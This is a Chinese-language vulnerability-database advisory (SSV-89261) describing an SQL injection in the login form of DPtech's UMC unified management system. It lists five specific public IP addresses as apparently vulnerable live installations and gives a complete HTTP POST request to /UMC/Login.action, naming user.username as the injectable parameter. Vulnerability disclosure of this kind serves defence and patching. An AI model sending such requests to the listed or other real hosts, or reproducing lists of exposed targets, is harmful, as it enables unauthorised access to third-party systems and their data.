迪普UMC统一管理系统SQL注入

基本字段

漏洞编号：: SSV-89261

披露/发现时间：: 未知

提交时间：: 2015-08-28

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: UMC

漏洞作者：: 未知

提交者：: nandisec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 5.9KB

DPtech UMC统一管理中心 案例： <pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">http://222.171.148.161/UMC/Login.action http://222.75.152.197:8080/UMC/Login.action http://222.47.70.3:8080/UMC/Login.action http://218.28.177.149/UMC/Login.action http://211.138.102.195:8080/UMC/Login.action</code></pre> 针对部分型号，并不通杀。 <pre><code style="margin: 0px; font-family: 'Lucida Console', 'Courier New', Courier, mono, monospace; color: rgb(51, 51, 51); background-color: rgb(248, 248, 248);">POST /UMC/Login.action HTTP/1.1 Host: 222.171.148.161 Content-Length: 56 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://222.171.148.161 User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 Content-Type: application/x-www-form-urlencoded Referer: http://222.171.148.161/UMC/Login.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: JSESSIONID=23B9AB4C1E48052484A6DC55D43EC6F4; JSESSIONID=5573F6953E2E1A27F87914CE46A5D1BD user.username=admin&user.password=admin&user.verify=prc1</code></pre> 参数user.username存在注入。